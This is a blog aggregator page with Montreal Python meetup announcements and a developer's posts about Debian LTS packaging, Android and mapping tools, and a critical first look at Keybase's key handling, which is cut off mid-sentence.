Skip to main content

External Blogs

Montréal-Python 58: Dramatics Chartreuse

Montreal Python - mar, 05/03/2016 - 23:00

We're close to a month before the next PyCon Conference in Portland, Oregon. We are organizing our 58th meetup at our lovely UQAM. Join us if you would like to feel what the Python community in Montreal is doing.

As usual we are receiving some guests in both languages and they will present you their projects and realizations.

Don't forget to join us after the meetup at the Benelux to celebrate spring in our lovely city.

Flash presentations

Kate Arthur: Kids CODE Jeunesse

Kids Code Jeunesse is dedicated to giving every Canadian child the chance to learn to code and to learn computational thinking. We introduce educators, parents and communities to intuitive teaching tools. We work in classrooms, community centres, host events and give workshops to supporting engaging educational experiences for everyone.

Christophe Reverd: Club Framboise (http://clubframboise.ca/)

Présentation du Club Framboise, la communauté des utilisateurs de Raspberry Pi à Montréal

Main presentations

Vadim Gubergrits: DIY Quantum Computer

An introduction to Quantum Computing with Python.

Pascal Priori: santropol-feast: Savoir faire Linux et des bénévoles accompagnent le Santropol Roulant (https://github.com/savoirfairelinux/santropol-feast)

Dans le cadre de la maison du logiciel libre, Savoir faire Linux et des bénévoles accompagnent le Santropol Roulant, un acteur du milieu communautaire montréalais dans la réalisation d'une plateforme de gestion de la base de donnée des clients en Django. En effet, au cœur des activités du Santropol Roulant, il y a le service de popote roulante qui cuisine, prépare et livre plus d’une centaine de repas chauds chaque jour à des personnes en perte d’autonomie. La base de données des clients joue un rôle clé dans la chaîne de services Réalisé en Django, le projet est à la recherche de bénévoles ayant envie de s'engager et contribuer au projet pour poursuivre le développement de la plateforme!

George Peristerakis: How CI is done in Openstack

In George's last talk, there was a lot of questions on the details of integrating code review and continuous integration in Openstack. This talk is a followup on the process and the technology behind implementing CI for Openstack.

Where

UQÀM, Pavillion PK

201, Président-Kennedy avenue

Room PK-1140

When

Monday, May 9th 2016

Schedule
  • 6:00pm — Doors open
  • 6:30pm — Presentations start
  • 7:30pm — Break
  • 7:45pm — Second round of presentations
  • 9:00pm — End of the meeting, have a drink with us
We’d like to thank our sponsors for their continued support:
  • UQÀM
  • Bénélux
  • w.illi.am/
  • Outbox
  • Savoir-faire Linux
  • Caravan
  • iWeb
Catégories: External Blogs

My free software activities, April 2016

Anarcat - lun, 04/25/2016 - 13:23
Debian Long Term Support (LTS)

This is my 5th month working on Debian LTS, started by Raphael Hertzog at Freexian. This is my largest month so far, in which I worked on completing the Xen and NSS packages updates from last month, but also spent a significant amount of time working on phpMyAdmin and libidn.

Updates to NSS and Xen completed

This basically consisted on following up on the reviews from other security people. I basically continued building up on Brian's work and tested the package on a test server at Koumbit, which seems to have survived well the upgrade. The details are in this post to the debian-lts mailing list.

As for NSS, the package was mostly complete, but I forgot to ship the tests for some reason, so I added them back. I also wrote the release team to see if it was possible to update NSS to the same version in all suites. Unfortunately, this issue is still pending, but I still hope we can find better ways of managing that package in the long term.

IDN and phpMyAdmin

Most of my time this month was spent working on IDN and phpMyAdmin. Unfortunately, it turns out that someone else had worked on the libidn package. This is partly my fault: I forgot to check in the dsa-needed.txt file for assignment before working on the package. But considering how in flux the workflow currently is with the switch between the main security team and the LTS team for the wheezy maintenance, I don't feel too bad. Still, I prepared a package which was a bit more painful than it should have been because of GNUlib. I didn't even know about GNUlib before, oddly enough, and after that experience, I feel that it should just not exist at all anymore. I have filed a bug to remove that dependency at the very least, but I do not clearly see how such a tool is necessary on Debian at this point in time.

But phpMyAdmin, no one had worked on that. And I understand why: even though it's a very popular package, there were quite a few outstanding issues (8!) in Wheezy, with 10-15 patches to be ported. Plus, it's ... well, PHP. And old PHP at that, with parts of it with modern autoloader classes, and other with mixed HTML and PHP content, require (and not require_once) and all sorts of nasty things you still find in the PHP universe. I nevertheless managed to produce a new Debian package for wheezy and test it on Koumbit's test servers. Hopefully, that can land into Wheezy soon.

Long term software support

I am a little worried that we are, both in Jessie and Wheezy sitting in between stable releases for phpMyAdmin, something that is a recurring issue for a lot of packages in Debian stable or LTS. Sometimes, it just happens that the version that happens to be in Debian testing when it is released as stable is just not a supported release upstream. It's the case for phpMyAdmin in Jessie (4.3, whereas 4.0 and 4.4 are supported) and Wheezy (3.4, although it's unclear how long that was supported upstream). But even if the next Debian stable (Stretch), would pick a stable release upstream, there is actually no phpMyAdmin release that has a support window as long as Debian stable (roughly 3 years), let alone as long as Debian LTS (5 years).

This is a similar problem with NSS: upstream is simply not supporting their product in the long term, or at least not in the terms we are used to in the Debian community (ie. only security fixes or regressions). This is, in my opinion, a real concern for the reliability and sustainability of the computing infrastructure we are creating. While some developers are of the opinion that software older than 18 months is too old, here we are shipping hardware and software in space or we have Solaris, which is supported for 16 years! Now that is a serious commitment and something we can rely on. 18 months is really, really, a tiny short time in the history of our civilization. I know computer programmers and engineers like to think of themselves in elitist terms, that they are changing the world every other year. But the truth is that things have not changed much in the last 4 decades where computing has existed, both in terms of security or functionality. Two quotes from my little quotes collection come to mind here:

Software gets slower faster than hardware gets faster. - Wirth's law

The future is already here – it's just not very evenly distributed. - William Gibson

Because of course, the response to my claims that computing is not really advancing is "but look! we have supercomputers in our pockets now!" Yes, of course, we do have those fancy phones and they are super-connected, but they are a threat to our fundamental rights and freedom. And those glittering advances always pale in comparison to what could be done if we wouldn't be wasting our time rewriting the same software over and over again on different, often proprietary, platforms, simply because of the megalomaniac fantasies of egoistic programmers.

It would be great to build something that lasts, for a while. Software that does not need to be updated every 16 months. You'd think that something as basic as a screensaver release could survive what is basically the range of human infancy. Yet it seems we like to run mindlessly in the minefield of software development, one generation following the other without questioning the underlying assumption of infinite growth that permeates our dying civilization.

I have talked about this before of course, but working with the LTS project just unnerves me so bad that I just needed to let out another rant.

(For the record, I really have a lot of respect for JWZ and all the work he has done in the free software world. I frequently refer to his "no-bullshit" backup guide and use Xscreensaver daily. But I do think he was wrong in this case: asking Debian to remove Xscreensaver is just too much. The response from the maintainer was exemplary of how to handle such issues in the future. I restarted Xscreensaver after the stable update, and the message is gone, and things are still all fine. Thanks JWZ and Tormod for keeping things rolling.)

Other free software work

With that in mind, I obviously didn't stop doing other computing work this month. In fact, I did a lot of work to try to generally fix the internet, that endless and not-quite-gratifying hobby so many of us are destroying our bodies to accomplish.

Build tools

I have experimented a bit more with different build tools. I got worried because at some point cowbuilder got orphaned and I figured I could refresh the way I build packages for LTS. I looked into sbuild, but that ended up not bringing much improvements over my current cowbuilder setup (which I really need to document better). I was asked by the new maintainer to open a bug report to make such setups easier by guessing the basepath better, so we'll see how that goes.

I did enjoy the simplicity of gitpkg and discovered cowpoke which made it about 2 times faster to build packages because I could use another server to build larger packages. I also found that gitpkg doesn't use -n by default when calling gzip, which makes it harder to reproduce tarballs when they are themselves built reproducibly, which is the case for Github tarballs (really nice of them). So I filed bug #820842 about that.

It would be pretty awesome if such buildds would be available for Debian Developers to do their daily tasks. It could simply be a machine that would spin up a chroot with cowbuilder or it could even be a full, temporary VM although that would take way more resources than a simple VM with a cowbuilder setup.

In the meantime, I should probably look at whalebuilder as an alternative to cowbuilder. It is a tool that supports building packages within a Docker chroot, which means that packages are built from a clean environment like pbuilder, and using COW optimisations but also without privileges or network access, which is a huge plus especially when you build untrusted packages.

Ikiwiki admonitions

I have done some work to implement Moinmoin-like admonitions in Ikiwiki, something I am quite happy about since it's something I was really missing about Moinmoin. Admonitions bring a really nice way to outline certain blocks with varying severity levels and distinct styles. For example:

Admonitions are great!

This was done with a macro, but basically, since Markdown allows more or less arbitrary HTML, this can also be done with the <div> tag. I like that we don't have a new weird markup here. Yet, I still liked the sub-parser feature of MoinMoin, something that can be implemented in Ikiwiki, but it's a little more clunky. Normally, you'd probably do this with the inline macro and subpages, but it's certainly less intuitive that directly inlined content.

Ereader

I got a new e-reader! I was hesitant between the Kobo Aura H20 and the Kobo Glo HD, which were the ones available at Bestbuy. So I bought both and figured I would return the other. That was a painful decision! In the end, both machines are pretty nice:

  • Aura H2O
    • Pros:
      • waterproof
      • larger screen (makes it easier to see web pages and better for the eyes)
      • naturally drawn to it
    • Cons:
      • heavier
      • larger (fits in outside pocket though)
      • port cover finicky
      • more expensive (180$) - prices may go down in future
  • Aura Glo HD
    • Pros
      • smaller (fits in inside pocket of both coats)
      • better resolution in theory (can't notice in practice)
      • cheaper (100$)
      • may be less common on the future (larger models more common? just a guess)
    • Cons
      • no SD card
      • smaller screen
      • power button in the middle

... but in the end, I ended up settling down on the Glo, mostly for the price. Heck, I saved around 100$, so for that amount, I could have gotten two machines so that if one breaks I would still have the other. I have ordered a cover for it on Deal Extreme about two weeks ago, and it still hasn't arrived. I suspect it's going to take a few more months to get there, by which point I may have changed e-reader again.

Note that both e-readers needed an update to calibre, so I started working on a calibre backport (#818309) which I will complete soon.

So anyways, I looked into better ways of transferring articles from the web to the e-reader, something which I do quite a bit to avoid spending too much time on the computer. Since the bookmark manager I use (Bookie) is pretty much dead, I started looking at other alternatives. And partly inspired by Framasoft's choice of Wallabag for their bookmarking service (Framabag), I started to look into that software, especially since my friend who currently runs the Bookie instance is thinking of switching to Wallabag as well.

It seems the simplest way to browse articles remotely through a standard protocol is by implementing OPDS support in Wallabag. OPDS is a standard developed in part by the Internet Archive and it allows for browsing book collections and downloading them. Articles and bookmarks would then be presented as individual books that would be accessible from any OPDS-compatible device.

Unfortunately, the Kobo e-readers don't support OPDS out of the box: you need to setup some OPDS-compatible reader like Koreader. And that I found nearly impossible to do: I was able to setup KSM (the "start menu", not to be confused with that KSM), but not Koreader in KSM. Besides, I do not want a separate OS running here on the tablet: I just want to start Koreader every once in a while. KSM just starts another system when you reboot the e-reader, something which is not really convenient on the Kobo.

Basically, I just want to add Koreader as a tile in the home screen on the e-reader. I found the documentation on that topic to be sparse and hard to follow. It is often dispersed across multiple forum threads and involves uploading random binaries, often proprietary, to the e-reader. It had been a long time since I was asked to "register my software" frenetically, and I hadn't missed that one bit. So I decided to stay away from this until that solution and its documentation matures a bit.

Streaming re-established

I have worked a bit on my home radio stream. I simply turned the Liquidsoap stream back online, and did a few tweaks to the documentation that I had built back then. All that experimenting led me to do two NMUs. One was for gmpc-plugins to fix a FTBFS (bug #807735) and to properly kill the shout streamer when completing the playback (bug #820908).

The other was to fix the ezstream manpage (bug #573928), a patch that had been sitting there for 5 years! This was to try to find an easy way to stream random audio (say from a microphone) to the Icecast server, something which is surprisingly difficult, consider how basic that functionality is. I was surprised to see that Darkice just completely fails to start (bug #821040) and I had to fallback to the simplest ices2 software to stream the audio.

I am still having issues with Liquidsoap: it's really unstable! As a server, I would expect it to keep running for days if not years. Unfortunately, there's always something that makes it crash. I had assertion failed (bug #821112) and I keep seeing it crash after 2-3 days fairly reliably, a bug I reported 3 years ago and that is still not fixed (bug #727307).

Switching back the stream to Vorbis (because I was having problems with the commandline mp3 players and ogg123 is much more lightweight) created another set of problems too, this time with the phone. It seems that Android cannot stream Vorbis at all, something that is even worse in Cyanogenmod... I also had to tweak my MPD config to make the Android client be able to load the larger playlists (see dmix buffer is full).

Android apps

So I have also done quite a bit of work again on my phone. I finally was told how to access from Termux from adb shell which is pretty cool because now I can start a screen on my phone and then, when I'm tired of tapping to type, I can just reconnect to it when I plug in a USB cable on my laptop. I sent a pull request to fix the documentation regarding that.

I also tried to see how my SMS and Signal situation could be improved. Right now, I have two different apps to do SMS on my phone: I use both Signal and the VoIP.ms SMS client, because I do not have a contract or SIM card in my phone. Both work well independently, but it's somewhat annoying to have to switch between the two.

(In fact, I feel that Signal itself has an issue with how it depends on the network to send encrypted messages: I often have to "ping" people in clear text (and therefore in the other app) so that they connect to their data plan to fetch my "secure" signal messages...)

Anyways, I figured it would be nice if at least there would be a SMS fallback in Signal that would allow me to send regular text messages from signal through Voip.MS. That was dismissed really fast. Moxie even closed the conversation completely, something I had never experienced before, and doesn't feel exactly pleasant. The Voip.MS side was of course not impressed and basically shrugged it off because Signal was not receptive.

I also tried to clear up the Libresignal confusion: there are 3 different projects named "Libresignal", and I am not sure I figured out the right thing, even though the issue is now closed and there's a FAQ that is supposed to make all that clear. Nevertheless, I opened two distinct feature requests to try to steer the conversation into a more productive direction: GCM-less calls and GCM support. But I'm not sure neither will go anywhere.

In the meantime, I am using the official signal client, which I downloaded using gplaycli and which I keep up to date with Aptoide. Even though the reliability of that site is definitely questionable, it seems that once you have a trusted version, it is safe to upgrade, regardless of the source because there is a trust path between you and the developer.

I also filed a few issues with varying levels of success/response from the community:

Random background radiation

And then there's of course the monthly background noise of all the projects I happened to not only stumble on, but also file bugs or patches against:

Catégories: External Blogs

Call for speakers: Montréal-Python 58: Dramatics Chartreuse

Montreal Python - dim, 04/17/2016 - 23:00

Spring has arrived and Montreal Python just got started. We are holding our next event on Monday, May 9th and it is a great chance to catch up and get out of your winter hibernation. It is an opportunity to come present cause we are looking for speakers for talks of 30, 15 or 5 minutes.

For example, if you are using Python to deploy Docker services, doing Big Data or simply having fun at discovering new tricks that make your life easier, we want you on stage :)

We are also looking for people interested for presenting a module of the month or a module that you love !

To submit your talk, write us at mtlpyteam@googlegroups.com

Where

More informations coming soon

When

Monday, May 9th 2016

We’d like to thank our sponsors for their continued support:

  • UQÀM
  • Bénélux
  • w.illi.am/
  • Outbox
  • Savoir-faire Linux
Catégories: External Blogs

MTL NewTech Startup Demos & Networking + PyCon Contest

Montreal Python - lun, 04/11/2016 - 23:00

PyCon is partnering again with MTL NewTech and Montréal-Python this year to bring one lucky Montreal startup to PyCon at Portland, Oregon, to present alongside with Google, Facebook, Stripe, Heroku, Microsoft, Mozilla and many other technology companies.

If you are a startup that meets the requirements below, apply now by filling this form: http://goo.gl/forms/zf9jO8n8vR With the following information: a) size of the team, b) age of the startup c) your use of Python.

Deadline for applications: May 5th 23h59. Announcement of the startups selected: Starting on May 5th. MTL NewTech Demo & announcement of the winner: May 10th Feel free to invite fellow startups

For more details about PyCon and the startup row in general, please head to the PyCon website at https://us.pycon.org/2016/events/startup_row/


==============
Eligible companies must meet the following criteria:

  • Fewer than 15 employees, including founders

  • Less than two years old

  • Use Python somewhere in your startup: backend, front-end, testing, wherever

  • If selected, please confirm that you will staff your booth in the Expo Hall on your appointed day. We will try accommodate your preferences: Monday or Tuesday

  • No repeats. If you were on startup row in a previous year, please give another a startup a chance this year.

==============

Catégories: External Blogs

My free software activities, march 2016

Anarcat - jeu, 03/31/2016 - 18:32
Debian Long Term Support (LTS)

This is my 4th month working on Debian LTS, started by Raphael Hertzog at Freexian. I spent half of the month away on a vacation so little work was done, especially since I tried to tackle rather large uploads like NSS and Xen. I also worked on the frontdesk shift last week.

Frontdesk

That work mainly consisted of figuring out how to best help the security team with the last uploads to the Wheezy release. For those who don't know, Debian 7 Wheezy, or "oldstable", is going to be unsupported by the security team starting end of april, and the Debian 6 Squeeze (the previous LTS) is now unsupported. The PGP signatures on the archived release have started yielding expiration errors which can be ignored but that are really a strong reminder that it is really time to upgrade.

So the LTS team is now working towards backporting a few security issues from squeeze to wheezy, and this is what I focused on during triage work. I have identified the following high priority packages I will work on after I complete my work on the Xen and NSS packages (detailed below):

  • libidn
  • icu
  • phpmyadmin
  • tomcat6
  • optipng
  • srtp
  • dhcpcd
  • python-tornado
Updates to NSS and Xen

I have spent a lot of time testing and building packages for NSS and Xen. To be fair, Brian May did most of the work on the Xen packages, and I merely did some work to test the packages on Koumbit's infrastructure, something which I will continue doing in the next month.

For NSS, wheezy and jessie are in this weird state where patches were provided to the security team all the way back in November yet were never tested. Since then, yet more issues came up and I worked hard to review and port patches for those new security issues to wheezy.

I'll followup on both packages in the following month.

Other free software work Android

TL;DR: there's an even longer version of this with the step-by-step procedures and that I will update as time goes on in my wiki.

I somehow inherited an Android phone recently, on a loan from a friend because the phone broke one too many times and she got a new one from her provider. This phone is a HTC One S "Ville", which is fairly old, but good enough to play with and give me a mobile computing platform to listen to podcasts, play music, access maps and create GPS traces.

I was previously doing this with my N900, but that device is really showing its age: very little development is happening on it, the SDK is closed source and the device itself is fairly big, compared to the "Ville". Plus, the SIM card actually works on the Ville so, even though I do not have an actual contract with a cell phone provider (too expensive, too invasive on my privacy), I can still make emergency phone calls (911)!

Plus, since there is good wifi on the machine, I can use it to connect to the phone system with the built-in SIP client, send text messages through SMS (thanks to VoIP.ms SMS support) or Jabber. I have also played around with LibreSignal, the free software replacement for Signal, which uses proprietary google services. Yes, the VoIP.ms SMS app also uses GCM, but hopefully that can be fixed. (While I was writing this, another Debian Developer wrote a good review of Signal so I am happy to skip that step. Go read that.)

See also my apps list for a more complete list of the apps I have installed on the phone. I welcome recommendations on cool free software apps I should use!

I have replaced the stock firmware on the phone with Cyanogenmod 12.1, which was a fairly painful experience, partly because of the difficult ambiance on the #cyanogenmod channel on Freenode, where I had extreme experiences: a brave soul helped me through the first flashing process for around 2 hours, nicely holding my hand at every step. Other times, I have seen flames and obtuse comments from people being vulgar, brutal, obnoxious, if not sometimes downright homophobic and sexist from other users. It is clearly a community that needs to fix their attitude.

I have documented everything I could in details in this wiki page, in case others want to resuscitate their old phones, but also because I ended up reinstalling the freaking phone about 4 times, and was getting tired of forgetting how to do it every time.

I am somewhat fascinated by Android: here is the Linux-based device that should save us all from the proprietary Apple nightmares of fenced in gardens and censorship. Yet, public Android downloads are hidden behind license agreements, even though the code itself is free, which has led fellow Debian developers to work on making libre rebuilds of Androids to workaround this insanity. But worse: all phones are basically proprietary devices down to the core. You need custom firmware to be loaded on the machine for it to boot at all, from the bootloader all the way down to the GSM baseband and Wifi drivers. It is a minefield of closed source software, and trying to run free software on there is a bit of a delusion, especially since the baseband has so much power over the phone.

Still, I think it is really interesting to run free software on those machines, and help people that are stuck with cell phones get familiar with software freedom. It seems especially important to me to make Android developers aware of software freedom considering how many apps are available for free yet on which it is not possible to contribute significantly because the source code is not published at all, or published only on the Google Store, instead of the more open and public F-Droid repository which publishes only free software.

So I did contribute. This month, I am happy to announce that I contributed to the following free software projects on Android:

I have also reviewed the literature surrounding Telegram, a popular messaging app rival to Signal and Whatsapp. Oddly enough, my contributions to Wikipedia on that subject were promptly reverted which made me bring up the subject on the page's Talk page. This lead to an interesting response from the article's main editors which at least added that the "its security features have been contested by security researchers and cryptography experts".

Considering the history of Telegram, I would keep people away from it and direct people to use Signal instead, even though Signal has similar metadata issues, mostly because Telegram's lack of response to the security issues that were outlined by fellow security researchers. Both systems suffer from a lack of federation as well, which is a shame in this era of increasing centralization.

I am not sure I will put much more work in developing for Android for now. It seems like a fairly hostile platform to work on, and unless I have specific pain points I want to fix, it feels so much better to work on my own stuff in Debian.

Which brings me to my usual plethora of free software projects I got stuck in this month.

IRC projects

irssi-plugin-otr had a bunch of idiotic bugs lying around, and I had a patch that I hadn't submitted upstream from the Debian package, which needed a rebuild because the irssi version changed, which is a major annoyance. The version in sid is now a snapshot because upstream needs to make a new release but at least it should fix things for my friends running unstable and testing. Hopefully those silly uploads won't be necessary in the future.

That's for the client side. On the server side, I have worked on updating the Atheme-services package to the latest version, which actually failed because the upstream libmowgli is missing release tags, which means the Debian package for it is not up-to-date either. Still, it is nice to have a somewhat newer version, even though it is not the latest and some bugs were fixed.

I have also looked at making atheme reproducible but was surprised at the hostility of the upstream. In the end, it looks like they are still interested in patches, but they will be a little harder to deploy than for Charybdis, so this could take some time. Hopefully I will find time in the coming weeks to test the new atheme services daemon on the IRC network I operate.

Syncthing

I have also re-discovered Syncthing, a file synchronization software. Amazingly, I was having trouble transferring a single file between two phones. I couldn't use Bluetooth (not sure why), the "Wifi sharing" app was available only on one phone (and is proprietary, and has a limit of 4MB files), and everything else requires an account, the cloud, or cabling.

So. Just heading to f-droid, install syncthing, flash a few qr-codes around and voilà: files are copied over! Pretty amazing: the files were actually copied over the local network, using IPv6 link-local addresses, encryption and the DHT. Which is a real geeky way of saying it's completely fast, secure and fast.

Now, I found a few usability issues, so much that I wrote a whole usability story for the developers, which were really appreciative of my review. Some of the issues were already fixed, others were pretty minor. Syncthing has a great community, and it seems like a great project I encourage everyone to get familiar with.

Battery stats

The battery-status project I mentionned previously has been merged with the battery-stats project (yes, the names are almost the same, which is confusing) and so I had to do some work to fix my Python graph script, which was accepted upstream and will be part of Debian officially from now on, which is cool. The previous package was unofficial. I have also noticed that my battery has a significantly than when I wrote the script. Whereas it was basically full back then, it seems now it has lost almost 15% of its capacity in about 6 months. According to the calculations of the script:

this battery will reach end of life (5%) in 935 days, 19:07:58.336480, on 2018-10-23 12:06:07.270290

Which is, to be fair, a good life: it will somewhat work for about three more years.

Playlist, git-annex and MPD in Python

On top of my previously mentioned photos-import script, I have worked on two more small programs. One is called get-playlist and is an extension to git-annex to easily copy to the local git-annex repository all files present in a given M3U playlist. This is useful for me because my phone cannot possibly fit my whole MP3 collection, and I use playlists in GMPC to tag certain files, particularly the Favorites list which is populated by the "star" button in the UI.

I had a lot of fun writing this script. I started using elpy as an IDE in Emacs. (Notice how Emacs got a new webpage, which is a huge improvement was had been basically unchanged since the original version, now almost 20 years old, and probably written by RMS himself.) I wonder how I managed to stay away from Elpy for so long, as it glues together key components of Emacs in an elegant and functional bundle:

  • Company: the "vim-like" completion mode i had been waiting for forever
  • Jedi: context-sensitive autocompletion for Python
  • Flymake: to outline style and syntax errors (unfortunately not the more modern Flycheck)
  • inline documentation...

In short, it's amazing and makes everything so much easier to work with that I wrote another script. The first program wouldn't work very well because some songs in the playlists had been moved, so I made another program, this time to repair playlists which refer to missing files. The script is simply called fix-playlists, and can operate transparently on multiple playlists. It has a bunch of heuristics to find files and uses a MPD server as a directory to search into. It can edit files in place or just act as a filter.

Useful snippets

Writing so many scripts, so often, I figured I needed to stop wasting time always writing the same boilerplate stuff on top of every file, so I started publishing Yasnippet-compatible file snippets, in my snippets repository. For example, this report is based on the humble lts snippet. I also have a base license snippet which slaps the AGPLv3 license on top of a Python file.

But the most interesting snippet, for me, is this simple script snippet which is a basic scaffolding for a commandline script that includes argument processing, logging and filtering of files, something which I was always copy-pasting around.

Other projects

And finally, a list of interesting issues en vrac:

  • there's a new Bootstrap 4 theme for Ikiwiki. It was delivering content over CDNs, which is bad for privacy issues, so I filed an issue which was almost immediately fixed by the author!
  • I found out about BitHub, a tool to make payments with Bitcoins for patches submitted on OWS projects. It wasn't clear to me where to find the demo, but when I did, I quickly filed a PR to fix the documentation. Given the number of open PRs there and the lack of activity, I wonder if the model is working at all...
  • a fellow Debian Developer shared his photos workflow, which was interesting to me because I have my own peculiar script, which I never mentionned here, but which I ended up sharing with the author
Catégories: External Blogs

State of Mapping on the Debian Desktop

Anarcat - dim, 03/13/2016 - 11:19

TL;DR: Mapbox Studio classic is not as good as Tilemill, Mapbox studio is very promising, but you still need to signup for access, and kosmtik seems to be working right now. Use kosmtik and help getting it in Debian.

The requirement

I have been following the development of fascinating tools from the Development seed people, now seemingly all focused on the Mapbox brand. They created what seemed to me a revolutionary desktop tool called Tilemill. Tilemill allowed you to create custom map stylesheets on your desktop to outline specific areas or patterns or "things". My interest was to create outdoor maps - OSM has pretty good biking maps, but no generic outdoor tiles out there (I need stuff for skiing, canoeing, biking)...

Mapbox has Mapbox outdoors but that's a paid plan as well. Oh and there's a place to download Garmin data files especially made for outdoors as well, and that could be loaded in Qmapshack, but they don't have coverage in Canada at all. Besides, I would like to print maps, I know, crazy...

So I have been looking forward to seeing Tilemill packaged in Debian given how annoying it is to maintain Node apps (period). Unfortunately, by the time Debian people figured out all the Node dependencies, the Tilemill project stopped and has been stalled since 2012. It seems the Mapbox people have now been working on other products, and in the meantime, the community, scratching their heads, just switched to other projects.

Overview of alternatives

I wrote this long post to the Debian bugtrackers to try to untangle all of this, but figured this would be interesting to a wider community than the narrow group of people working on Javascript packages, so I figured I would send this on Debian planet.

So Here's a summary of what happened so far, after Tilemill development stopped. Hang on to your tiles boys and girls, there's a lot going on!

Mapbox Studio classic

Mapbox people have released a new product in September 2014 named Mapbox studio classic. The code is still freely available and seems to be a fork of tilemill. Mapbox classic still has releases on github, last one is from November 2015. It looks like Mapbox studio classic has some sort of Mapbox.com lock-in, and there are certainly new copyright issues, if only with the bundled fonts, but it could probably be packaged after addressing those issues.

There is an ITP for Mapbox Studio classic as well.

Mapbox Studio

Then there's Mapbox Studio, which is a full rewrite of Mapbox Studio classic. You need to "signup" somehow to get access, even though parts of the code are free, namely the Mapbox GL studio project. It is an interesting project because it aims to make all this stuff happen in a web browser, which means it "should" work everywhere. Unfortunately for us, it means it doesn't work anywhere without a signup form, so that's out for me at least.

There is an [ITP for Mapbox-studio][] yet it is unclear to me what that one means because the source code to Mapbox-studio doesn't seem to be available, as far as i can tell (and the ITP doesn't say either).

That is actually the ITP for Mapbox studio classic.

Kosmtik

The Openstreetmap-carto developers have mostly switched to kosmtik instead of Mapbox. Kosmtik is another Node desktop app that seems fairly lightweight and mostly based on plugins. Ross has an ITP for kosmtik. The package is waiting on other node dependencies to be uploaded (yes, again).

The future of Tilemill

And there's still this RFP for tilemill, which should probably be closed now because the project seems dead and plenty of alternatives exist. I wonder if node some dependencies that were packaged for Tilemill actually now need to be removed from Debian, because they have become useless leaf packages... I am leaving the Tilemill RFP open for someone to clean that up.

CartoCSS

Oh, and finally one could mention another Mapbox project, Carto, a command line CSS tools that implements some sort of standard CSS language that all those tools end up using to talk to Mapnik, more or less. There are no RFPs for that.

Catégories: External Blogs

Trying out Keybase

Anarcat - jeu, 03/10/2016 - 14:37

I was privileged enough to get access to the alpha preview of Keybase.io. Last year, the project raised 11M$ in venture capital and they seem to be attacking the hard problems, so it is a serious project, worth considering for any cryptography hacker like me. This was obviously discussed elsewhere previously but since Keybase has evolved a bit since then, I figured it would be worth adding my grain of salt.

The elite alpha problem

My first problem with Keybase was of course that I wasn't in the elite club of invited people. Somehow, I finally got in but the problem remains for the everyone else.

In my case, it was the Keybase filesystem announcement that brought my attention back to the project, although I have yet to test that itself - yet another invite-only problem (need to email chris@keybase.io to get access, I guess). Still, 10GB of storage might be interesting for some people, but considering the number of hurdles or "friction", as they say, that needs to be jumped over to get access, I am not sure how much traction this will get for now.

The project has been in alpha for a while now (more than a year) with no announced public beta just yet, which is way slower than similarly challenging projects with less capital. Let's encrypt, as a comparison, was publicly announced in 2014 and by the end of 2015, the public beta was opened.

Private key leakage

My second major concern is that Keybase does worrisome things to private key material. If you tell it to import your regular GPG keys, it will copy them into the keybase keyring, which is already a problem: now you have two places where you store sensitive secrets.

But worse, Keybase offers you to upload your private key material on the server, without clearly and explicitely exposing the potential risks that means to the user. The key, presumably, is encrypted (at least that is what I can parse from the Keybase privacy policy). Yet this is still a concern: a determined attacker (e.g. the government or another malicious entity) could force Keybase to give up the encrypted private key material and install sniffers that would reveal the passphrase that would allow decryption and impersonation of the related identity.

That is a huge deal. This is what caused Hushmail's demise in 2007: they had similar promises about how they had a "secure" email (in this case) service based on OpenPGP, but since they key was stored on the server, they only had to serve a malicious applet to victims and were able to give cleartext data to the US government (12 CDs!) under a Mutual Legal Assistance Treaty with Canada.

In Keybase, When I generate a new key, it asks me if I want to upload the key to their servers, and "Yes" is chosen as a default, so it is clearly a policy that is encouraged. This is presumably to enable browser-based crypto, yet this could be done by storing keys within the browser, not on the server.

The mere possibility that the client can meddle with secret key material in such a way is a problem. Even if uploading secret keys to the server is optional, the fact that it is a possibility widens the attack surface on the client significantly.

GPG has been working on isolating private key operations to a different process (gpg-agent) or smart cards, SSH has privilege seperation. The idea of uploading secret key material online is so beyond current practices that it should bring the project to a full stop already.

My private key material is pretty sensitive. I am a Debian developer: if someone gets access to that key, they can upload arbitrary code for thousands of packages, affecting thousands if not millions of users. That is a huge deal, and I am not ready to give that power to an arbitrary third party that I know little about.

Privacy policy issues

Furthermore, the Keybase privacy policy explicitely states that "Logs of this information may persist for an indefinite period", which include, and I quote:

  • Your computer’s IP address
  • Your preferences and settings (time zone, language, privacy preferences, application preferences, etc.)
  • The URL of the site that referred you to the Service
  • The buttons and controls you clicked on (if any) within the Service
  • How long you used the Service and which parts and features you used
  • Session times and lengths

For a company working to improve user's privacy, this is a pretty bad policy. It exposes Keybase users to undue surveillance, on a lot of private information that is not necessary to operate the service. I haven't actually read the remaining of the policy, as I was already scared as hell and figure I would just log off for now and try not to add any extra personal information in that already growing pile.

Let's mention, while I'm here, that the keybase commandline client has this odd way of working that it forks a daemon in the background all the time, even to run just keybase status. One has to wonder if this thing is included in the surveillance data above, which would make the keybase client an amazing surveillance device in itself. To stop all this, you need:

keybase logout keybase ctl stop

Not quite obvious...

Usability issues

Which brings me to a series of usability issues I have found while working with Keybase. Having worked on usability myself in the Monkeysphere project, I understand how hard those problems can be. But right now, the fact is that keybase is only a commandline client, with some web-based sugar sprinkled on top. I recognize the huge efforts that have been done to make the user experience (UX) as easy as possible through the commandline, but this is definitely not "grand public" material yet.

Even as a OpenPGP hacker, Keybase can get confusing. Since it has its own separate keyring from GPG, things that used to be obvious before are suddenly new things to learn. For example, I originally generated a key for anarcat@debian.org in keybase, thinking it would be a separate thing from my current GPG identity. Well, that ended up creating a new key in my GPG keyring, duplicating my existing identity, with no way for me to tell this was a Keybase copy. This could have ended up on the keyservers and confuse anyone looking for my PGP key.

Revoking keys

So I revoked that key, which, in itself, is not such an obvious process either. I first had to "drop" the key:

keybase pgp drop '010143572d4e438f457a7447c9758804cc7be44c1ee2b7915c3904567d0a3fb5cf590a'

To find that magic number, I had to go on the website and click through the PGP key to end up on the revoke link which told me which magic string to put. The web UI was telling me I could use keybase status to get that information, but I couldn't find that in the output here:

